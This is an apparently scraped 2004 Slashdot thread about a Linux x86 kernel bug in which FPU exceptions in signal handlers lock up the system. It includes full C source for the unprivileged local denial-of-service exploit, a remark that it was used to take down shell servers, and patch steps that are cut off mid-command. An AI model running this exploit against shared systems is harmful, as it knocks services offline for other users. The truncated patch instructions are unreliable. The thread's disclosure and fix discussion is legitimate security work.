New Linux Kernel Crash-Exploit discovered
Ant writes "According to a linuxreviews article dated 6/11/2004, there is a nasty bug that lets a simple C program crash the kernel (2.4.18 through 2.6.x reported so far), effectively locking up the whole system. It affects both 2.4.2x and 2.6.x kernels on the x86 architecture. The exploit can be compiled and run with ordinary shell access; root access is not required. Detailed information and source code are provided." You need to have shell access to run this program; it's also worth noting that not *all* flavors are vulnerable. Please read the article for the full details.
RTFA! The bug only works on the x86 platform, so buying a Mac and running Linux on it would get around the bug!
Parent might be a troll or flamebait, but not off-topic!
here's a direct link to the patch.
;)
not whoring.
... that if you trigger a floating point exception inside a signal handler (specifically SIGALRM), the kernel doesn't handle it correctly, hanging the system. It appears to affect both SMP and UP kernels.
Some questions I have to those who may have been following this:
Does the crash occur without the syscalls in the signal handler/main process?
Does the crash occur on SMP machines?
Does the crash occur with other signals (PIPE, USR1, etc.)?
Does the crash occur on ppc, sparc, etc?
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
./evil halts the system is quite dull. I hoped some kernels would be unaffected because 2.4.26-rc3-gentoo and 2.4.26_pre6-gentoo are, but sadly almost all kernel versions die when evil is executed.
/usr/src/ /usr/src/linux-2.4.26 signal.c-2.4.21.patch.txt) is tested and works for Kernel 2.4.21 (vanilla).
/usr/src/linux-2.4.26 2.4.26-rc3-gentoo.
/usr/src/ /usr/src/linux-2.4.25 "EXTRAVERSION = -rc3-gentoo" /usr/s
#include <sys/time.h>
#include <signal.h>
#include <unistd.h>

/* SIGALRM handler: saves and restores the x87 state around a write(). */
static void Handler(int ignore)
{
    char fpubuf[108];   /* buffer for the x87 state image */
    __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
    write(2, "*", 1);
    __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}

int main(int argc, char *argv[])
{
    struct itimerval spec;

    signal(SIGALRM, Handler);
    /* Fire SIGALRM every 100 microseconds. */
    spec.it_interval.tv_sec = 0;
    spec.it_interval.tv_usec = 100;
    spec.it_value.tv_sec = 0;
    spec.it_value.tv_usec = 100;
    setitimer(ITIMER_REAL, &spec, NULL);
    while (1)
        write(1, ".", 1);
    return 0;
}
Using this exploit to crash Linux systems requires the (ab)user to have shell access. The program works from any normal user account; root access is not required. This exploit has reportedly been used to take down the servers of several "lame free-shell providers" (this is illegal in most parts of the world and strongly discouraged).
This code only works on x86 Linux machines. This code does not compile (makes no executable) on sparc64 sun4u TI UltraSparc II (BlackBird). This doesn't affect NetBSD Stable.
Check your own system if you are wondering whether this affects you. Better safe than sorry: assume it will crash, and sync (or even unmount) your file systems before testing. If your system is a production server with 1000 online users, do not test this code on that box.
How to protect yourself
The last days were frustrating. Compiling a large number of different kernel versions just to find that gcc crash.c -o evil &&
The Linux Kernel mailing list is found to the right of this article. You may find solutions there not mentioned on this page. The author does subscribe and plans to post (better) solutions here as they appear.
Patch for 2.4.2x (vanilla) Kernels
Stian Skjelstad mailed me a working patch for 2.4 kernels.
2.4.26
I applied it, confirmed that it works with the vanilla 2.4.26 kernel and made a diff (diff -ur linux-2.4.26/kernel/signal.c linux-2.4.26-x/kernel/signal.c > signal.c-2.4.26.patch.txt). (signal.c-2.4.26.patch.txt)
1. Read the Kernel Rebuild Guide if this is your first time compiling your own kernel
2. Download linux-2.4.26.tar.bz2 from your local Linux Kernel Mirror
3. Unpack the kernel source and make a symbolic link:
* cd
* tar xfvj linux-2.4.26.tar.bz2
* ln -s linux-2.4.26 linux
4. Download the patch for 2.4.26: signal.c-2.4.26.patch.txt
5. Apply the patch
* patch -p1 -d
1. Get a vanilla 2.4.21 kernel and install it.
2. Apply the patch
* patch -p1 -d
I have no idea why this kernel version is safe from this exploit. It just is. This kernel patch set returns Floating point exception instead of locking the system when evil is executed.
This kernel can be used on any Linux system. It does not require any Gentoo-only tools.
1. Read the Kernel Rebuild Guide if this is your first time compiling your own kernel
2. Download linux-2.4.25.tar.bz2 from your local Linux Kernel Mirror
3. Get the patch set for Gentoo 2.4.26-rc3-gentoo (mirror1) (mirror2) aka 2.4.26_pre5:
* wget http://re.a.la/gs (2,2M)
4. Unpack the 2.4.25 kernel source:
* cd
* tar xfvj linux-2.4.25.tar.bz2
5. Apply the Gentoo patchset:
* patch -p1 -d
8. Configure your kernel
* Using your old config: cp
Wheel of Time: Book by Book and Sumview (summary review) Bigdady92 style: http://bigdady92.blogspot.com/
The article says it affects x86 (and x86-64) only.
So itanium, ppc, etc. are safe. But my other questions still remain.
Note that the person who reported the bug thought they were triggering a gcc bug. As it turns out, he munged his FPU assembly instructions.
The GCC people rightly told him to contact the lkml... it's definitely an exception handling issue.
This can be executed on any webhost with ftp access and a cgi-bin.
Here is the LKML discussion thread on the subject. It's an interesting bug, briefly summarised by Matt Mackall as follows:
So there's a bit of a massive problem with FPU exception handling, which didn't come to light before. Wheee. Fun.
Universities.
www.timcoleman.com is a total waste of your time. Never go there.
FYI... My RH7.3 with gcc 2.96 and a 2.4.20 kernel is also vulnerable.
He, who dies with the most toys, wins
I have shell on my old dialup ISP's Sun machines, have for over a decade now. Many shared webhosting farms run on Linux on x86 and if you have CGI you basically have shell since you can run arbitrary code. Also any place that does development work under Unix probably gives their developers shell access (duh). So I would say there are a lot of places that give more than just the inner circle monks of IT shell access.
There are 4 boxes to use in the defense of liberty: soap, ballot, jury, ammo. Use in that order. Starting now.
That's right... they don't want to break the CometCursor, KaZaa, download managers, money savers, and other malware etc that are in the tray... then they wonder why their computers always crash and blame it on Microsoft.
I work as an IT Director for a real estate company and as a tech for Best Buy and at BB we've started a tally for the highest number of malware found by AdAware... I think the highest was well over 5000!!! Needless to say we recommended a restore O_o
-
From 0 to drunk in $20
Beware of patch.
It could be another Linux Kernel 2.4.11
The article doesn't attempt to explain anything.
(Someone please correct me if I have this wrong)
After poking around in the LKML, I've mostly figured it out.
The kernel wasn't handling floating point exceptions correctly in the signal handler. The problem is that if the exception is triggered by the LAST instruction in the handler, the kernel tries to deliver it to a signal context which no longer exists. The same thing was happening with execve... if you triggered it right before the execve syscall, the application context would be destroyed, and the pending exception would be pointing to a nonexistent instruction. The exception handler would jump off into space trying to deliver SIGFPE...
So they changed __clear_fpu (which is called when doing an initial switch back to user space [I think]) to clear any pending FPU exceptions, because there was no way they could be handled anyway.
Missing an FPU exception doesn't sound so bad. I think someone was posting a better solution, which would attempt to handle it the right way... (I didn't really follow the more extensive patch, anyone care to explain?)
Yea, the only difference is that in OSS the steps are usually covered in about a third the time.
This hit the kernel-list dated 2004-06-09 21:02:57. It is now 2004-06-14 09:41:12 in my neck of the woods, and it is patched. The last update mentioned on the article's page is yesterday. It would appear the patch was available in no more than 4 days. It takes more than four days for a lot of vendors just to look at the goddamn report. Then they spend the next week hoping it goes away on its own. Then they ignore the follow-ups. Two months later when the submitter has had enough, they go to FULL DISCLOSURE and the vendor gets pissed off and starts attacking the person who reported it for not giving them enough time to write a patch they haven't even started on. Then they spend another month making lousy excuses for why it's not a serious issue and half-assed suggestions of what you can turn off to avoid the problem. Finally, after about four months of hand wringing, press releases, and general bullshit, you might get a patch. If you're lucky, it won't require you to start the process over again by introducing a brand new vulnerability. If you're lucky.
There's a huge difference here. The Linux folks jumped up and solved the problem. They didn't sit around pissing on their hands for months and making excuses like a lot of vendors do.
Alito: A vote for Alito is a punch in the eye to put that bitch back in her place!
In defence of the article, "lame free-shell provider" is presented in quotes; it's not the website or the author using the term. It's a quote from the perpetrator. There's no connection to open source.
Talked about on the mailing lists.
http://marc.theaimsgroup.com/?l=linux-kernel&m=108695598318818&w=2
Says session just dies. Host is OK.
Yep, I never spell check.
More incorrect spellings can be found he
Doesn't crash my win2k pro box. I'm all for slagging off MS, but let's do it with real bugs eh?
"WHAT YOU SAY!?"
I run a corporate network without a firewall. Every time a major issue comes around and destroys every freaking company around me, I go by with maybe two systems affected. Why? I stay up-to-date on all patches, and I keep relatively SANE security policies in place.
A firewall is a lot less necessary than firewall vendors would have you believe. My experience is that firewalls breed a false sense of security. Someone goes home over the weekend with a laptop - and comes back with a zombie virus/worm/etc. that goes and infects everything while the IT department is "taking their time" evaluating a security update for a month (I do 24 hour tests).
Why not firewall, is the other thing I hear. Mostly, it's so that every one of my systems can be an internet service provider. That's what the internet is about. Enabling users to say, hey - I've got that file right here on my local FTP, come get it. Here, log onto my VNC desktop, and I'll show you.
Firewalls create industries like WebEx. Because technology has come from 'wow, I didn't know you could do that,' to, 'I didn't know you could do that because I'm firewalled.'
Finally, "It doesn't happen very often," quite clearly means that it has happened. Call it pre-teen style bitching if you will, but a lawsuit should have never been threatened (AFAIK, a lawsuit never actually went to court). If someone finds a vulnerability, full disclosure should not be the only method to have Microsoft take you seriously. My teen years are LONG behind me, maybe I'm just sick of having to deal with Microsoft's crap since Windows for Workgroups 3.11 (when the problems started for me).
Kinetic stupidity has a new brand leader: Allen Zadr.
God I wish I could edit posts.
The issue isn't that the context is gone... the issue is that the kernel is executing a waiting FPU instruction (i.e. "fwait") on returning from a context that flushes a user thread (i.e. return from signal handler, syscall after execve). That triggers the FPE, except the kernel isn't set up to handle FPEs properly from kernel space in this case. The problem is that the TS flag is set because it's switching tasks, so it receives a different exception, trap 7 (device_not_available). The purpose of that exception is to signal the kernel that a newly created process wants the FPU. So it attempts to set up the FPU... which ends up calling __clear_fpu again... heh... and the original exception isn't cleared yet... whoops.
What's really weird is I found this document, which details the potential problems of trying to use the FPU in an interrupt handler in the Linux kernel.
They brought up the potential of triggering this EXACT PROBLEM... quote "endless trap 7 activation"... only in this case they're talking about writing an interrupt routine, not returning from a signal handler. Still, they already discovered this misbehavior...
Well, you can't really call it that, though. It was sort of by design (to make task switching faster). But the thing is you have to be ABSOLUTELY SURE that you never raise an FPE when TS is set, and you're NOT a user thread. That's what gets you burned here.
The thing about Windows bugs is that many of them are remotely exploitable by unprivileged users; in order to exploit bugs like this, and in fact any root compromise that I know of, you need to first get a shell on the machine. Much harder than throwing up a web page or sending out a trojaned email.
--
I Hit the Karma Cap, and All I Got Was This Lousy
You are probably refusing "virus-infected" messages.
Here's how:
Add compiler group:
Move to correct directory:
Make most common compilers part of the compiler group
Set permissions
To add users to the group, modify and change to '123' will be different on your installation.
Again, don't think this is a fix for the exploit. It's just a good little step in securing a box.
"I filter at +6, and have yet to miss out on an important comment." (#822545)
Yeah, well, the so-called "tin-foil-hat crowd" has noticed the fact that autoupdate on windows XP is crap. Have you ever compared the list of updates it gets for you, to the list on the actual windows update site? I've had cases where there were 2-3 more critical updates that autoupdate didn't download.
It also doesn't help that it won't autoupdate service packs, causing everything after the service pack to just not show up, without autoupdate even notifying you that there is a service pack to manually download and install.
And way back when the Slammer worm was big news, autoupdate got the patch to me the week after it made /. (complete with people griping that the patch was out "months ago"). And then got the patch again every day for the next 4 days.
Tin foil and conspiracy theory has nothing to do with the fact that I no longer trust autoupdate.
Didn't work for me. I just get a white screen in the middle of the command prompt with a purple border that says in purple 0: PING 192.168.0.7. Pressing Enter runs ping a couple times.
I'm far from a Windows fanboy. I use Linux almost all the time... I just happened to have a Windows box on my network atm.
Look out!
Where does it say in the standard that you have to explicitly call EXIT_SUCCESS?
Some people are pedantic about these sorts of things. Personally my only spelling pet peeve is seeing people use 'alot'.
*shrug*
Granted, this crashme program, which requires local shell access, does seem to work in some cases.
However, it does not do so on SUSE Linux 9.1: it creates an unkillable process, but the system continues to run normally.
As for your Win2k 'sploit, I call bullcrap. Doesn't work, but a nice command history comes up, so I'll thank you for that tip.
Oh, and saying that local exploits aren't taken seriously is both a major understatement, and a not-so-major problem. After all, you can fix all the Denial-of-Service exploits you want, but if someone has local access to the machine, they can always pull out the power cord.
That is not easily fixed with an OS patch. Never underestimate the use of a heavy door and good locks.
Slashdot still doesn't support Unicode after it was added to the HTML standard in 1997.
help ulimit
Tested their code on Redhat ES 3.0 with all current updates applied (2.4.21-15.ELsmp - they haven't released any new kernel updates specific to this problem). The process will suck up a cpu spinning in a tight loop, and is unkillable (even as root with kill -9), but it does not crash the system.
Redhat seems to have different code in signal.c around the area the signal.c patch mentions, but does not have the i387.h patch.
11*43+456^2
My test was on a dual P4 (hyperthreading). Running a single instance of the code only locked a single cpu. I just played with it again, and running 4 instances locked the box. So RHEL3 is vulnerable, and a correct description of the problem is that the exploit locks up 1 cpu in an endless loop that cannot be stopped. For systems with multiple CPUs, you have to do this once for each cpu (twice for each physical cpu if hyperthreading) in order to lock the whole box up.
http://linux.bkbits.net:8080/linux-2.5/diffs/include/asm-i386/i387.h@1.16?nav=index.html|src/.|src/include|src/include/asm-i386|hist/include/asm-i386/i387.h
The name's grahamlee. I was using a word from the english language and taking it to mean that which is its accepted meaning. It's even written as such in the dictionaries.
That's a load of rubbish; all computers since the dawn of time have certainly not been exclusively von Neumann computers (as distinct from von Neumann machines, of course). Note all of the computers that employ the Harvard architecture. And I doubt you can conveniently ignore those unless you never ever intend to use a DSP (ever). The Harvard architecture is named after the Harvard Mark I (a.k.a. IBM ASCC), and one of its programmers was a certain Grace Hopper. She went on to big things, you know.
You mean Neumann János? [I'm not happy that a paid-for title should necessarily be honoured.] I wonder whether he was able to see the word 'nonzero' written down without trying to invent a new meaning for it....probably. Anyway, the achievements or otherwise of a Hungarian mathematician have little bearing on your version of the word nonzero's definition, which of course comes from the Old French / Latin prefix "non-" and the Arabic "çifr". Not that your definition isn't necessarily valid in some field, I'm sure it is. It's just that the previous (c. 1879) definition already has a lot of inertia everywhere else, because people know that that is what the word means.
That actually doesn't work anymore... unless you haven't patched Win2k?
Also... that's a problem with printf() mainly... not windows.